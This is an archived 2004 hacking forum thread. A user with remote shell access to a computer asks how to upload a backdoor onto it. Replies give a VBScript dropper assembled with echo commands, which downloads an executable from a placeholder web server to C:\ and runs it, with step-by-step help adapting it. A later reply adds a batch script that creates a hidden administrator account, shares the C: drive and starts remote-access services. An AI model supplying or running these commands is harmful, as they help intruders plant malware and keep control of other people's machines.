XtrA
Feb 13 2004, 02:06 PM
hi
im in a remote computer by cmd..
i can delete.. i can make.. i can stop and kill but i fuckin` cant upload by tftp or echo !!
what should i do to put there my backdoor or so?
Copkill
Feb 13 2004, 03:02 PM
| CODE |
echo Dim HTTPGET>>c:\madefile.vbs echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>c:\madefile.vbs echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", false>>c:\madefile.vbs echo HTTPGET.Send>>c:\madefile.vbs echo DataBin = HTTPGET.ResponseBody>>c:\madefile.vbs echo Const adTypeBinary=1>>c:\madefile.vbs echo Const adSaveCreateOverWrite=2>>c:\madefile.vbs echo Dim SendBinary>>c:\madefile.vbs echo Set SendBinary = CreateObject("ADODB.Stream")>>c:\madefile.vbs echo SendBinary.Type = adTypeBinary>>c:\madefile.vbs echo SendBinary.Open>>c:\madefile.vbs echo SendBinary.Write DataBin>>c:\madefile.vbs echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite>>c:\madefile.vbs
|
mrBob
Feb 13 2004, 03:38 PM
how-to-hack question...
XtrA
Feb 13 2004, 04:00 PM
| QUOTE (mrBob @ Feb 13 2004, 03:38 PM) |
how-to-hack question... |
lol its not how to hack question
XtrA
Feb 13 2004, 04:01 PM
| QUOTE (Copkill @ Feb 13 2004, 03:02 PM) |
Try the HTTP Script:
Look here: http://www.governmentsecurity.org/forum/in...indpost&p=39512
| CODE | echo Dim HTTPGET>>c:\madefile.vbs echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>c:\madefile.vbs echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", false>>c:\madefile.vbs echo HTTPGET.Send>>c:\madefile.vbs echo DataBin = HTTPGET.ResponseBody>>c:\madefile.vbs echo Const adTypeBinary=1>>c:\madefile.vbs echo Const adSaveCreateOverWrite=2>>c:\madefile.vbs echo Dim SendBinary>>c:\madefile.vbs echo Set SendBinary = CreateObject("ADODB.Stream")>>c:\madefile.vbs echo SendBinary.Type = adTypeBinary>>c:\madefile.vbs echo SendBinary.Open>>c:\madefile.vbs echo SendBinary.Write DataBin>>c:\madefile.vbs echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite>>c:\madefile.vbs
|
|
plz explain me more :\
i dont really understand where should i change things and how
Copkill
Feb 13 2004, 04:22 PM
| CODE |
| echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", false>>c:\madefile.vbs |
h**p://www.your-HTTP-Server.com/file-you-want-to-upload.exe
| CODE |
echo SendBinary.SaveToFile ""c:\file.exe, adSaveCreateOverWrite>>c:\madefile.vbs
|
echo SendBinary.SaveToFile "c:\file-you-want-to-upload.exe", adSaveCreateOverWrite>>c:\madefile.vbs
Then start the script
C:\madefile.vbs
it download then the file to C:\ from the HTTP Server.
rockerx
Mar 5 2004, 12:14 PM
nice script!
thanx, iŽll try it
Thom
Mar 5 2004, 01:02 PM
creat a user on the system, share C:\(net share C$=C:\) and start the RPC services
@echo off
net user /add User PASS
net localgroup administrators USER /add
net start RasAuto
net start RasMan
net start RpcSs
net start RpcLocator
net start RemoteRegistry
net start RemoteAccess
something like that
DumpZ
Mar 5 2004, 01:20 PM
Why do u need to start the RPC services ? I that needed to transfer the files thru http?
Qlimax
Mar 5 2004, 04:20 PM
next time look @ Tutorials & tip's topic's.
Thom
Mar 5 2004, 06:10 PM
RPC services are needed for remote connections.
Hey Qlimax, didnt know you were here ^^
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.